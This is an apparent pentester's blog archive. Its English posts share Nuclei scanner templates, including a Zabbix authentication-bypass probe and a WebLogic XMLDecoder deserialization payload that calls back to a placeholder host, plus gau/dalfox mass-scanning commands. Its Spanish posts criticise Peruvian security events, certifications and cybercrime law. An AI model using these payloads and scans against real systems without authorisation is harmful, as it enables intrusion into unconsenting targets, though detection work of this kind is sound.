Wednesday, May 05, 2021

A little small tiny contribution to Nuclei templates

 Doing traditional pentest is still fun (the real one, not the one like "You have a vulnerable version of XYZ software and sorry, no evidence of exploitation nor PoC).

One of the latest I got took me to make a small contribution to Nuclei Templates, yes, pure YAML.

A teammate noticed that Zabbix installation in one target was vulnerable to authentication bypass. A well known vulnerability and I wanted to know if there was a template from Nuclei and yes, there was one.  However, Nuclei + this template couldn't find the vulnerability.

CVE-2019-17382.yaml template had a request like this :

requests: - method: GET path: - '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'

Problem is that Dashboards can be deleted and the id will change, I mean, in several installations there is no dashboardid=1, but, maybe equal to 2 or 12 or whatever.

So, the new version of the request makes use of a payload (in this case a file with a list of possible IDs) and changes to a raw request :

requests:

  - payloads:
      ids: helpers/wordlists/numbers.txt

    attack: sniper
    threads: 50

    raw:
      - |
        GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0
        Accept-Language: en-US,en;q=0.9

Wednesday, March 03, 2021

Web Vulnerability Scanning based on URLs from Wayback Machine, OTX, Common Crawler

 [gau + burp | dalfox] GAU : Get complete URLs from site such as wayback machine, common crawler (kinda shoda for URLs) and Allien Vault incidents db.  DALFOX : web vuln scanner, mainly for XSS.

"getallurls (gau) fetches known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl for any given domain."

GO111MODULE=on go get -u -v github.com/lc/gau

gau -b png,jpg,gif example.com > gau.rpt  <==a bunch of URLS with arguments (if they exist on those providers)


* Chained with Burp :

for url in `cat gau.rpt`; do http --verify no --proxy https:https://127.0.0.1:8080 $url; done


Then, active scan over them (they will appear in site map)


* Chained with Dalfox

GO111MODULE=on go get -v github.com/hahwul/dalfox/v2


cat gau.rpt | dalfox pipe

Monday, February 15, 2021

Back to post : Nuclei vulnerability scanner

Repo :  https://github.com/projectdiscovery/nuclei

Get the binary or compile the source

Download templates :

git clone https://github.com/projectdiscovery/nuclei-templates.git

Nuclei is based on "signatures" from services based on HTTP/HTTPS (Yara rules based)

It's easy to add "rules" or templates to search for other vulnerabilities and get another vulnerability scanner : additional, light and it's part of a new kind of scanners that use same techniques (not everyone uses yaml).

Notice that it targets low hanging fruits.

Adding a template for weblogic :

1. Analized how previous similar vuln was detected (send a xml by GET)

2. Create a template such as this one :

cat nuclei-templates/weblogic.yaml 

id: CVE-2019-2729


info:

  name: WebLogic Deserialization

  author: wcu35745

  severity: high

  #reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2729

  

requests:

  - method: GET

    path:

      - "{{BaseURL}}/wls-wsat/CoordinatorPortType"

    headers:

      Content-Type: text/xml

      SOAPAction: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8" class="java.beans.XMLDecoder"><void id="url" class="java.net.URL"><string>http://%s:%d/cve-2017-10271?target=%s%s</string></void><void idref="url"><void id="stream" method = "openStream" /></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

    matchers:

      - type: status

        status:

            - 200

      - type: word

        words:

            - "weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl"

        part: body

3. Words come from the response to the request with the xml SOAP envelope.

4. Put the URLs to scan in a text file (http or https://dns_name_or_IP) or use the -t parameter for single target

5. If found vulnerable, an output such as this one will appear :

./nuclei -l targets.txt -t nuclei-templates/weblogic.yaml -v -timeout 20 -retries 3


                       __     _ 

     ____  __  _______/ /__  (_)

    / __ \/ / / / ___/ / _ \/ / 

   / / / / /_/ / /__/ /  __/ /  

  /_/ /_/\__,_/\___/_/\___/_/   v1   


projectdiscovery.io


[WRN] Use with caution. You are responsible for your actions

[WRN] Developers assume no liability and are not responsible for any misuse or damage.

[INF] [CVE-2019-2729] Loaded template WebLogic Deserialization (@wcu35745) [high]

[CVE-2019-2729] https://ip_address/wls-wsat/CoordinatorPortType   

There is no other indication, only the absence of the previous [status] 

Monday, June 16, 2014

Otra vez...si, again...sobre Eventos y "eventos" de Seguridad y "seguridad"

Como 140 caracteres no son suficientes, me toco volver al querido blog para defogar de manera adecuada mis impetus por ponerle claro a varios que no todos somos idiotas, que habemos peruanos con el suficiente nivel intelectual como para no dejar que nos metan el dedo y prevenir a otros que no se  lo dejen meter.

El proximo miercoles se llevara a cabo un "evento" de "seguridad" que resulta, cuando menos, asombroso.
Se supone que es un evento "academico" y ya tuve el "placer" de asistir el año pasado, salvo dos presentaciones (Erick Iriarte y Juan Davila), las demas fueron un bodrio total.  Desde el español con infulas de presentador de TV hasta el greengo vendedor de cebo de culebra.  Hubo uno mas que al menos reconocio que fue a vender sus productos, asi lo dijo y asi trato de hacerlo, valga su honestidad.
Este año les pido que vayan.  Si, aunque parezca contradictorio, vayan.  Duden de lo que escribo y vayan para que, luego, puedan comentar si aprendieron algo en alguna de las "charlas"...PERO...descontemos de esas "charlas" a las exposiciones de Erick Iriarte y Claudio Caracciolo porque esas seran las unicas dos que valdran la pena.
Entonces, si hay algo bueno, aunque sea 2 de 10 speakers, por que criticarlo ?  Por todo lo demas!
Organizadores : Alguien conoce a Pukaratech ?  Yo tampoco, pero, revisando un poco, veo que es una empresa que se constituyo despues que se hizo el anuncio del evento (donde ya aparecia como organizadora) y que tiene un representante legal cuyo segundo apellido coincide con el segundo apellido del organizador.  Este mundo esta lleno de coincidencias!
Sponsors : Que cuentan con una empresa de dudosa reputacion que siempre es bienvenida porque se pone con un buen billete como sponsor.  Claro, en los eventos donde son muy inocentes o prefieron no enterarse.
Nombre del Evento : Es bien curioso que lo califican como un evento academico en su web y en varios lados donde se han movido, inclusive en la prensa especializada, PERO, en su pagina de Facebook dice que es una empresa! Entonces, evento o empresa o ambos ?  Esta moda de la "union civil"...
Lugar, patrocinador, auspiciador o que ? :  El evento se hace en una de las instalaciones del Ejercito Peruano.  A ver si me explican como lo hacen.  Les pagan por usar el auditorio y areas conexas y por el control que debe ejercer el personal al ingreso, movimiento y salida de los participantes ?  Por el consumo de luz, agua, etc. ?
El organizador es un miembro activo del Ejercito Peruano, hablaran un par de Generales, aparecen logos de unidades del Ejercito Peruano y todo ello para un evento comercial, si, COMERCIAL, NO academico!
Y si tengo el derecho a exigir que me expliquen todo eso porque aunque sea un milesimo de los impuestos que pago puntualmente a SUNAT van a parar al mantenimiento de esa instalacion, a pagar el pauperrimo sueldo de los soldados que custodian el lugar.
Costo : Si, el evento "academico" de "seguridad" "no tiene costo", PERO, si quieres un "certificado", debes pagar US$18.  Eso ya es COMERCIAL.
A ver, asumo que vendra con base de madera y vidrio encima, como los de GIAC, minimo!  Es que US$18 o casi S/.50 por un certificado, minimo lo mandan a imprimir a US y de ahi lo envian para aca.
Solo para referencia : un certificado de Brainbench impreso en buenisima calidad y que viene desde US cuesta US$14,95.
Pero, mas importante que el precio es saber a donde ira a parar el dinero de los pobres tontos que paguen por ese certificado ?!
O peor aun, cuan absurdo es ostentar un certificado de haberse pasado el dia escuchando 8 charlas comerciales o tan basicas que los niños de pre-escolar se aburririan como todos los soldados que se quedaban dormidos en el evento del año pasado ?! (Sigo exceptuando las de Erick y Claudio).  Premio a que ?! A dormir sin roncar ?

Este tema de los "eventos" de "seguridad" ya es cansado en Perú.  Mientras que en otros paises proliferan eventos serios y buenos de seguridad, aca siguen surgiendo y promocionandose "eventos" como el que critico.
Ya otro "eventero" que cobraba por certificados tuvo que mudarse fuera de Lima y hasta fuera de Perú, pero, como vio que se le acabo el publico, ya paro.

Se que alguno pensara "claro, como este tio organizo su "*Hack" y ahora organiza su "*HACK", le jode que otros lo hagan..." o "como el no participa como speaker, le jode...".
Como siempre digo, me importa muy poco lo que piensen de mi los que no me conocen.
Los *HaCk son 100% gratuitos y 100% seguridad a la vena.  Nadie puede discutir eso, asi como nadie puede discutir que se necesitan otro tipo de eventos de defensa y gestion en seguridad de la informacion y seguridad informatica.

Pero, hay eventos en los que no tengo vela como los de ISACA y me parecen super buenos, mas los mensuales que el evento principal.
ISSA organiza eventos de seguridad enfocados en sectores diferentes.
Ambos tienen sus toques comerciales, pero, detras de ellos hay gente vigilando que los participantes no reciban un "callejon oscuro" de vendedores de cebo de culebra.
OWASP Perú, cuantos de los que lean este post han ido a sus eventos?  Este año han arrancado haciendo eventos mensuales, eventos especiales y seguiran con mas cosas.
Y hasta los eventos de seguridad que son netamente comerciales y se anuncian como tal, pueden valer la pena porque no se presentan con hipocresia : te vendo mi cebo de culebra, me lo compras ?

Y si se pueden hacer eventos 100% gratuitos.  Se tienen que trabajar mucho por conseguir sponsors y hasta poner dinero de su propio bolsillo, pero, asi es cuando se quieren hacer eventos que realmente aporten y no que sean un negocio.
Por ello, seria mas honesto presentar el evento como "evento comercial de seguridad" y presentarse como "organizador de eventos" y no como "profesional de seguridad".
BTW, critique el evento hace tiempo en Linkedin, el organizador me mando un mail por ese medio haciendome "el pare" y fiel al estilo del gordo Phillip Butters, le di todos mis datos para que me busque, me llame o lo que sea y decirle todo en su cara.  Sigo esperando.

Entonces, los que lean esto y vivan en Lima y no sean futboleros (existira alguien asi?), vayan al "evento" y despues comentan publicamente, asi me equivoque esta vez (ojala!).
Claro, mi sincera recomendacion es que vayan a escuchar a Claudio y Erick (terminan a la 1pm) y de ahi fugen a ver el España vs Chile que debera estar buenisimo!

Friday, December 27, 2013

Memorias del 2013 y algo más...

Me resisti, pero, aca estoy otra vez posteando, claro, algo que la "Ley de Delitos Informaticos" no impida.

No puedo dejar de referenciar unos comentarios que lei hace unos dias sobre un video de una entrevista que nos hicieron a Cesar Cuadra y a mi durante el segundo LimaHack.  Diablos !  Que ira en esos comentarios !
Entre chilenos ( o pseudo chilenos ) que nos odian (a los peruanos) y peruanos que nos odian por ser peruanos !  (estos ultimos son los peores).

Igual, hasta las idioteces y forma de escribir (pésima ortografía y peor redacción) me hicieron reflexionar sobre varias cosas que paso a comentar.

La gente lee y escucha lo que le da la gana.  Ojo, esto es bien diferente de la interpretación que alguien pueda hacer respecto a una exposición de ideas y lo es porque al hablar de hacking todo es bien absoluto, discreto, si o no, 1 ó 0, por suerte!  Así que si uno dice algo, es una verdad o una mentira.
Recibir un PDF que se llama "infoAES256" y decir que no hay data relevante y que es altamente probable que sea parte de un CSA es un hecho, pero, cuantos saben realmente que es un CSA ? Y eso que existen hace muchos años...

Eso me lleva al problema básico que tenemos en nuestro país : hay gente que sabe de hacking, pero, no son muchos.
Incluso, no puedo dejar de referenciar a un tuit reciente de  (http://pastebin.com/raw.php?i=HdM5SPzc) donde describen como hicieron una penetración a la red y servicios de un ministerio para "leakear" cierta información.  Cuantas personas son ? Dos unicamente ? Cuatro (2 colaboradores más) ? El hecho es que existen y tienen los conocimientos suficientes para hacer lo que hicieron, pero, insisto : no son muchos.

Para mí, esto ocurre por varias taras :

  • El "perfil bajo" que es el escudo a la mediocridad.  Esta vulgar excusa hace que la gente no hable ni escriba porque no son "figurettis" o porque los "tecnicos no hablan mucho".  Falacia!  Si alguien habla o escribe para decirle a los demás que es el mejor hacker del mundo, si es figuretti, pero, sí lo hace para compartir los resultados de su aprendizaje o investigación, lo que esta haciendo es CRECER como persona y profesional y ayudar a CRECER a los demás.  Por ello, el "perfil bajo" solamente es un escudo para aquellos que quieren crear un alito de misterio a su alrededor y solamente saben que nada saben.
  • Hay gente que cree que sabe porque aprendió a usar algunas herramientas de software o porque "hackea" cuentas de personas en redes sociales.  Y en esto caigo en el mismo problema de los taxis parando en cualquier parte o de los micros llenos de gente : no es solamente problema de los conductores, es problema de los pasajeros también !  Sí existen "hackers" como en la calle Wilson, es porque existen clientes que piden sus "servicios" y se genera un "mundo de hackers" que realmente no lo es.   Sí existen "hackers eticos" o "pentesters" que hacen evaluaciones mediocres es porque existen clientes que saben poco o nada respecto al tema y, lo que es peor, no les interesa saber más !  Es por ello que los de  adicionaron "No basta saber Ethical Hacking" porque esta muy venido a menos!
  • Aún existen peruanos que no soportan que hayan otros peruanos que les vaya bien.  Acaso ven a los argentinos o colombianos o ecuatorianos o chilenos "metiendose cabe" entre ellos con el amplio ratio que lo hacen muchos peruanos ?  Aca existe un fulano que se dedica vender "cebo de culebra" a los desconocedores.  Vive de hacer eventos de forensia y hacking en Lima y ahora en provincias y la mayoría son "gratuítos" y cobra por emitir "certificados", de eso vive y se autodenomina "experto".  Siempre en sus "charlas" raja de otros peruanos para posicionarse, ninguno le parece bien e incluso por ahi dijo que se han ido a "importar" hackers a otro país para sus eventos porque acá no hay...Insisto: es lo mismo que los taxis y micros : quien puede querer un certificado por ir a un evento de puras charlas ?  Que nivel de conocimiento puede garantizar con haberse sentado a escuchar parlotear y mostrar fotos a unos individuos ? BTW : por eso ni LimaHack ni PERUHACK dan certificados, son GRATUITOS al 100% y no pretenden ser "cursos de hacking" ni similares, solo despertar conciencia y difundir conocimiento.
  • Los medios de comunicación hacen un aporte absurdo o no aportan al tema.  Con este asunto de la "Ley de Delitos Informáticos", cuántos hackers peruanos fueron invitados a dar opinion respecto al tema ?  Solamente invitaron a abogados y de todos, solo uno mantiene relación con hackers (Erick Iriarte  ). Si, ya se, alguien saldrá a decir "un hacker no se presenta en TV...", "un hacker no se autodenomina", etc (laaaargo etc.)  Ya deberíamos dejarnos de tanta retórica ya que por andar debatiendo el uso de términos perdemos mucho tiempo y eso no le aporta nada a lo que nos interesa : el hacking.  Un delincuente informático no se presentaría ni por TV, radio o prensa escrita, pero, un hacker si.  Antes de escribir este post vi un reportaje de un canal de TV sobre una noticia basada en el reporte de un fabricante de antivirus que indica que en Perú esta la mayor cantidad de hackers de Latino América.  Lo primero que me surge como pregunta es : no se dan cuenta que Perú (más rápido o más lento) es el país con mayor crecimiento económico en la región y eso nos hace CLIENTES deseados ?!  Osea, que mejor forma de venderle a los peruanos que metiéndoles miedo ?  Porque la afirmación de ese fabricante no va por el lado de "bien peruanos! son unos genios!" si no por el lado de "peruanos cuidado! viven en la inseguridad total! nosotros podemos cuidarlos!" Y, luego, el reportaje mete a la gente de DIVINDAT (ya lo se, no les daré más, pero, si debo decir que no estan preparados para este mundo de inseguridad y por ello su opinión casi siempre va a /dev/null) y se ponen a hablar de carders como si no vieran que la mayoria no son peruanos.
El título del post hace referencia a "memorias del 2013" y todo lo anterior parece ser una constante a través del tiempo y si, lo es, y, por ello, también, lo fue en el 2013.  Hay más, pero, como no quiero quedarme criticando unicamente, aca van mis ideas respecto a lo que se debe hacer para terminar con esas taras :
  • Dejemos el "perfil bajo" en el /dev/null.  Cómo ? Cuando vayamos a un evento o una clase, preguntemos a discresión, "sangremos" al expositor o profesor, obliguemoslo a que piense y que si no tiene la respuesta al momento, investigue y difunda la respuesta.  No tengamos vergüenza de preguntar.  Objetemos : sí tenemos otra posición, postura o el expositor/profesor dice una estupidez o comete un error, hay que  decirselo, dejemos de querer ser "nice" todo el tiempo.  Comuniquemonos : usen el Twitter para compartir sus conocimientos, blogueen, organicen reuniones presenciales para conversar sobre hacking, exijan y participen en eventos de hacking, no tengan temor de exponer sus conocimientos porque, mucho o poco, simple o sofisticado, siempre hay alguien que no lo sabe y le servirá.
  • Sí para mejorar el sueldo y el puesto me piden una maestría y no es requisito saber de hacking y de inseguridad, perfecto, a estudiar la maestría, PERO, a leer e investigar mucho de hacking.  No se puede pretender que todos sean hackers, pero, por qué funcionan los ataques a las redes y servicios "protegidos" aún hoy en día ?  Porque quienes administran la seguridad solo saben hacer eso : administrar, gestionar y confian en los vendedores de productos y servicios de seguridad porque se supStop pone que tienen "expertos".  Y si, es cierto, tienen "expertos" en configurar software y gestionar seguridad, pero, no en IN-seguridad o seguridad ofensiva (término muy usado este año, suena bien, créditos a Offensive Security).
  • No tengamos temor en denunciar cuando vemos que un proveedor de seguridad hace mal su trabajo o cuando un "ethical hacker" hace un trabajo miserable y mediocre o cuando una "empresa de prestigio internacional" presente documentos adulterados o cuando un "hacker ético" dicta cursos "oficiales" con material pirateado (contratado por dicha empresa).  Pero, no solo hablemos de lo negativo : este año he visto como Alonso Caballero () ha hecho un excelente trabajo como profesional del hacking ético a través del entrenamiento por diferentes medios y con una excelente calidad.  No menciono a alguien de Open-Sec porque podrán decir que es cherry para lo mio, pido disculpas a la gente de nuestro equipo por no hacerlo.  Felipe Gonzalez es otro profesional que aporta mucho desde el 2009 (que es el año en que lo conocí) ().  Cómo no mencionar a Juan Oliva () que este año anduvo por varios países de Sud América y Europa difundiendo conocimiento y entrenando a un monton de personas en seguridad y hacking de VoIP.
  • Cualquier momento y cualquier foro es bueno para emitir opinión.  Sí los medios de prensa no dan cabida al tema es porque aún dejamos que nos vean como primitivos.  Este año acudí a un evento de ciberseguridad y ciberdefensa en una entidad militar.  Es increíble como pueden venir personas extranjeras y peruanas a hablar tanta cosa básica y comercial como sí fuesemos "primariosos".  Charlas llenas de mensajes de ventas, de "mete-miedo", de figurettis, etc. y una audiencia aburrida, pero, callada "para no hacer roche".  Hay que hablar, no digo pararse a reclamar, pero, si a preguntar cosas reales, a objetar y a usar ese foro como debe ser.  En ese evento se habló de la Ley de Delitos Informáticos y casi nadie pregunto o dió una opinión y tenían a un experto en la materia al frente ! Menos mal que una charla similar en PERUHACK 2013 fue materia de preguntas y debate amplio en la misma sala.
Viendo las cosas de otra perspectiva, este año trajo muchas cosas buenas y malas, como siempre, no ? :
  • Ya no se si creer en las certificaciones o no, lo confieso.  Son tantos los que no las tienen que lejos de ser apreciadas, terminan siendo menospreciadas.  Saque el OSCP solo por demostrarme que podía someterme a ese reto que todos dicen es super dificil y lo hice solo (no en grupo como varios que conozco).  Luego, vino el C(PTC, pero, eso fue por un obsequio de la gente de Mile2.  Además, he visto gente que tiene certificaciones que consiguió por saber estudiar bien y no porque sepan de hacking.  Aún mantengo mi postura : si sabes de hacking, saca al menos una certificación para que demuestres y te demuestres el nivel de conocimiento que tienes ya que te mide en varios aspectos.
  • Relacionado a lo anterior esta el hecho que no sabría como recomendar a alguien que certificación obtener porque la oferta de entrenamiento es cercana al 0x00 y la dichosa  Ley de Delitos Informáticos puede permitir que un juez interprete que el impartir conocimientos sobre como explotar vulnerabilidades sea un delito toda vez que demostrar que no existió dolo deberá pasar por un proceso judicial para sentar jurisprudencia (que otros inviertan en abogados, yo no y menos con un sistema de justicia tan ineficiente y corrupto como el peruano).
  • Sigo insistiendo : el mejor equipo de hackers éticos peruanos esta en Open-Sec.  De hecho, CREO que solo hay 2 o 3 equipos en Perú y somos el más numeroso y con más años de experiencia.  Esto no es "panudearse" es solamente el reconocimiento a llevar más de 7 años dedicados a evaluar la seguridad de una cantidad y tipo de organizaciones de Perú, Ecuador y US que no veo en otros.  Es más, es un reconocimiento que me alcanza apenas un poco en lo personal porque es el trabajo de un grupo de gente que vive todo el día y todos los días cuestionando la seguridad y analizando vectores de ataque para hacer evaluaciones que son pagadas por nuestros clientes y que reciban recomendaciones que de verdad los ayuden a resolver sus problemas de seguridad informática.  Por eso sacamos el eslogan de They run automated tools, We have ETHICAL HACKERS puesto que si fuesemos meros "corredores de herramientas", creanme que estariamos bien jodidos y andariamos haciendo otras cosas más para ganar dinero.
  • Jalando el tema en base a lo anterior, fuimos el único equipo de peruanos que desarollo una herramienta de hacking y tuvimos que parar su desarrollo y sacarla del aire por esa absurda "Ley de Delitos Informáticos".  Desarrollar Tumi fue una experiencia inolvidable porque no era otra tool para "no-pensantes" ni solamente una que haga "information gathering", hacia todos los pasos de un pentesting, era ligera, estaba hecha en Python, era 100% modificable por cualquiera y nos ayudo a demostrarnos a nosotros mismos de lo que eramos capaces.  Acuerdense de Ratatouille y lo que decia el Chef Gusteau : cualquiera puede cocinar.
  • No puedo dejar de mencionar que ninguno de los dos puntos anteriores fue apreciado por dos clientes y un potencial cliente que decidieron optar por otro proveedor para servicios de hacking porque costaban la mitad que nosotros.  Lo que me dejo esto como experiencia es que hay clientes que no saben medir el nivel de servicio que reciben (creanme que hemos hecho una auto-evaluación para buscar nuestras fallas) y eso es falla nuestra por no saber "educar" al cliente.  En el otro caso del potencial cliente, fue de lo más absurdo : se quejaron que el proveedor del año pasado les hizo una pésima evaluación, pero, como nosotros eramos más caros, tomaron al del año pasado.
  • Lo anterior me lleva a comentar que sigo apreciando muchisimo el desarrollo de Ecuador como país, se nota que los cambios de verdad no solo se dan por tener más dinero si no por hacer que la gente cambie y vea las cosas de forma diferente.  Claro, para eso se requiere un líder como Rafael Correa, pero, un líder sin ciudadanos con amor por su país y propósito de enmienda no serviría.  Ecuador es un excelente país!
  • Igual, nuestra base es Perú y en el 2013 crecimos un 30% con respecto al 2012.
  • Este año fue de eventos, participe en el CSI 2013 de Colombia y en Campus Party Quito 2013.  Siempre seguiré elogiando a los ecuatorianos : 1:30 am y la gente seguía participando en el taller de Scripting para Pentesters que estabamos dictando con Camilo y Mauricio.  También, este año me opuse a la forma en que organizaron LimaHack 2013 y decidí que en lugar de solamente criticar, debía hacer algo diferente organizando PERUHACK 2013 (http://peruhack.org).  Con el apoyo de muchas personas (Grover Cordova, Jesús Hernandez, John Vargas, Marcia Sifuentes, Jean del Carpio, Camilo Galdos, Cesar Flores, Miguel Guerra, Renatto Gonzales, Pablo Munar), se consiguió tener un evento muy bueno dirigido a profesionales de la seguridad informática.  De hecho, tuvimos unas charlas excelentes, muy técnicas y un invitado desde España : Lorenzo Martinez ().
  • También, este año leí y escuche de tantas cosas que me parecen pura venta como el "pentesting by design" que es una suerte de mix de automatizado y semi-automatizado, pero, que para mi es otro rollo comercial más como el "cloud computing".
  • Sigo siendo fanático de nmap y sqlmap, será por el "map" ? Yo creo que es porque ambas me permiten modificarlas según lo necesite y con ello pasar por alto las "protecciones".  Antes solía jugar con Metasploit, también, pero, este año apenas hice algo con vbsmem para que funcionen varios CSA.
  • Este año revise varios informes sobre APT para ver que tan ciertos y validos eran.  La verdad, hay demasiadas cosas cuestionables en esos informes que nos presentan a los chinitos como los culpables de todos los ataques y encima como poco inteligentes en estas lides.
  • El 2014 arrancará definiendo vectores de ataque para todos los componentes del sistema de BITCOINS.
  • La publicación de advisories no es algo que hagamos bien, de hecho, encontramos un  0day en un IPS de WatchGuard, pero, dejamos la redacción del advisory para después de terminar el pentest en el que andabamos inmersos y para ese momento, ya no era un 0day.  LENTOS!!
Me he pasado la última semana pensando en qué cosa podría poner en este post que sea 100% técnica, es decir, un script o una técnica, pero, todas estan reñidas con la "Ley".  Finalmente, pense que cualquiera que lea este post caerá en una de dos categorías : el que lee bien (1 ó 0) y el que interpreta las cosas como le da la gana y el hecho que ponga o no ponga algo "técnico" no cambiará ese hecho.

Así que deseo a todos, amigos y enemigos, peruanos y extranjeros, cualquiera que lea este post : que el 2014 sea un año MUY BUENO para Uds.!

Saturday, January 19, 2013

Algunos puntos para los cuales 140 caracteres no son suficientes...Enero 2013

Hay una serie de temas que me tienen hace meses pendiente de escribir y el querido Twitter solo me dejaria escribir a puchitos, asi que aca van, cortos, pero, van :

---> Hackers :

Wow! Parecen conejos! Los hackers se multiplican, sobre todo esos que leen mucho y que saben mucho!
Seguro que alguien dira que yo solo alucino a los de Open-Sec (por años somos el unico equipo de hackers peruanos que solamente nos dedicamos a esto y que nos va muy bien), pero, mas alla de mis "preferencias" por este team, tambien saben que siempre me excluyo de esa elite de verdaderos hackers (tal vez aun arrastro algo de linuxero donde no se aceptan las autocalificaciones y cada que alguien dice que soy hacker, digo : no, solo soy parte de un team de hackers DE VERDAD.
Pero, eso de "leen mucho" es cachoso porque leen mucho por Internet, prueban poco, investigan nada y hasta hacen tutoriales y videos y cuanta vaina puedan hacer para obtener el "reconocimiento popular".
Tambien, eso de "saben mucho" es cachoso porque se afanan tanto en demostrar lo mucho que saben que pierden el sentido basico de cualquiera que este metido en esto : nunca sabras mucho de todo!
Lo que si creo que falta es resaltar a los aficionados y profesionales que si estan haciendo las cosas MUY BIEN sin importar su nivel de conocimientos porque pueden estar iniciando, madurando o perfeccionando.
Tambien, se que alguien pensara, luego de lo que sigue, "claro, es su pata", pero, que diablos! Por que Andres Morales Zamudio no es una mega-estrella del mundo del hacking a nivel internacional si sabe muchisimo mas que varios argolleros que andan pululando por los eventos de hacking en Latino America ?!
Facil respuesta : Andres no se autoproclama genio ni tiene una banda de amigos que lo haga por el, Andres no tuitea frecuentemente, tampoco bloguea re-fritos y menos "crea" toolz refritas ni anda pidiendo que lo inviten a dar charlas a eventos.
Y asi puedo nombrar un buen grupo de gente peruana : Cesar Cuadra, Alfredo García, Mauricio Urizar, Camilo Galdos, Juan Oliva, Hernan Parodi (todos los anteriores son Open-Sec), Fernando Flores, Oscar Martinez, Mauricio Velazco (99.9% still Open-Sec guy), casi todos los que exponen en LimaHack (aunque tambien caen por ahi varios lammers, otros alucinados y otros que se presentan, pero, la charla la hace otro) y seguro me faltan varios nombre, PERO, tambien omito otros varios adrede.
Si, ya se, suena a amargura todo esto, pero, ojo, no es por mi, es porque siempre andamos, los peruanos, alucinando lo que venga de fuera y aunque pasa asi en otros paises (lo vemos cuando nos toca salir de nuestro querido pais), aca es alucinante.

--->Posts re-fritos :

Quieres ser famoso como hacker ? Bloguea re-fritos, osea, esas cosas que ya se publicaron miles de veces, pero, que tu publicitaras como si recien se hicieran, como obras ineditas.
Solamente tomen un momento para buscar en Google textos similares o identicos, no se limiten a buscar en Español, busquen en Ingles y otros idiomas, total, hay traductores everywhere.
Hace poco leia el reclamo de uno de estos "hackers" sobre que otro "hacker" habia publicado cosas suyas sin el debido "reconocimiento", el segundo "hacker" pide disculpas por la omision y a mi me da risa porque he encontrado mas de un texto del primer "hacker" (el ofendido) que son copia fiel de otros posts hechos en Ingles, claro, pone otros screenshots, señal que al menos probo lo que decia el blog original.

--->Hackers certificados :

De hecho que los "balotarios" estan haciendo un buen trabajo, sobre todo en las certificaciones que no actualizan sus bases de datos de preguntas.
Cada vez hay mas gente certificada sin entrenamiento (100% aceptable), pero, sin experiencia previa que determine un nivel de conocimientos como para aprobar un examen de certificacion.
Y ya que la economia peruana es de las mejores, hay dinero para invertir en examenes asi sean caros.
Siento que terminare dando la razon a muchas personas que me decian que el asunto de las certificaciones perderia valor en el tiempo porque lejos de ser un factor de medicion, se convierte en un factor de engaño.
Peor aun cuando hay gente que ya perdio la certificacion y no tienen la honestidad de comunicarlo y aun se presentan como gente certificada.
Por ejemplo, casi nadie sabe que si uno mantiene vigente la certificacion de C|EH, hay un certificado adicional que demuestra dicha vigencia.
Tampoco saben que otros como Mile2 y GIAC mantienen bases de datos publicas donde se puede ver si la certificacion de la persona es vigente o no.


--->Hackeando a los Hackers :

Esta es breve :

1. Debes aprender Linux, no puedes ser hacker usando solo MS Windows, no seas payaso!
2. Debes aprender Ingles, al menos, de lo contrario, como diablos siquiera leeras un readme ?! Menos pensar en modificar la tool o crear una.
3. Debes tener perfil de desarrollador para llegar a un nivel alto, de lo contrario, estaras limitado a ser un buen profesional (osea, hoy haces hacking, mañana instalas un firewall, pasado eres un gerente sin memoria tecnica).
4. Debes leer mucho.
5. Debes investigar mucho.
6. No debes tener horario de oficina.
7. Penetrar no es meterse a un server, es meterse a todos los que puedas incluido el que esta apagado! (medio broma, facil es un server con wake-on-lan).
8. Debes saber mas que tus toolz.
9. Tus toolz son necesarias, aprende a usarlas bien, cuidalas, quieralas, mejoralas, mandalas al asilo cuando creas que ya son viejas (algun dia las podras recoger para darles un paseito).
10. Aceptalo: tendras que trabajar en equipo!

--->Concursos del Estado Peruano :

Estos son mas gracioso cada vez, siempre hacen la lista de Papa Noel, se da el concurso y siempre gana el mas barato.  Teniendo empresas como aquella (viene de otro continente) que se baja los pantalones a cada rato, es facil conseguir servicios baratos.
Solo conozco una entidad donde hay una persona que sabe mucho y una vez que dije algo asi, se molesto porque me dijo que me iba directamente contra el (esa empresita acababa de ganar un concurso en su entidad).  Pero, la cosa es que los tecnico no deciden, aceptenlo!
Ayer y hoy me llaman 2 personas por un concurso en una entidad del Estado donde no quieren que gane el unico postor que se presento.  Como  ?!  Son conscientes de unos antecedentes negativos de dicho postor, pero, nunca se animaron a divulgarlo por ser "polites", por no ser parte de un chisme o porque la hipocresia gana al peruano y siempre quiere ser nice.
Ahora, corren a pedir ayuda para impedir que le den la buena pro a ese postor, que buena vaina!
Leo las bases, no veo el nombre del postor, "miro mas alla de lo evidente" y zas! salen sus siglas, URL, talla del brasiere, talla de correa, etc.  Y ahora no quieren que gane ?! No pues! Dejenlo que gane y exijanle que haga el servicio como debe ser!

--->Algo técnico para no quedar sin demostrar :

No es perfecto, pero, me sirve siempre :

#!/bin/bash
#Uso : xtracthosts.sh dominio wget|directorio archivo_urls
#dominio como acme.com (sin nombre de host ni cname)
#la palabra wget o el nombre del directorio de una descarga previa
#archivo de texto con urls como http://www.acme.com y https://www.acme.com
#Si, en mi desorden, publique primero una version que no es la ultima
if [ $2 = "wget" ]; then
    wget -r --no-check-certificate -i $3
fi
if [ $2 != "wget" ]; then
    cd $2
else
    cd www.$1
fi
url="http|https://*.$1"
grep -R -E "$url" * | cut -d "/" -f 4 | cut -d '"' -f 1 | grep $1 | cut -d "'" -f 1 | sort -u > ../hosts-$1.txt
cat ../hosts-$1.txt
cd ..

Saturday, July 28, 2012

Comentarios a unos "tips" sobre C|EH

Buceando un poco me encontre con un post de una persona cuyo nombre omito, pero, encontre algunas inexactitudes y le he posteado un comentario.  Como no estoy seguro que lo publique, lo hare en mi blog :

XYZ, hola.

Algunas preciisones :

1. La certificacion de C|EH no expira despues de 2 años, puedes ver la informacion detallada de esto en https://cert.eccouncil.org/ece-policy
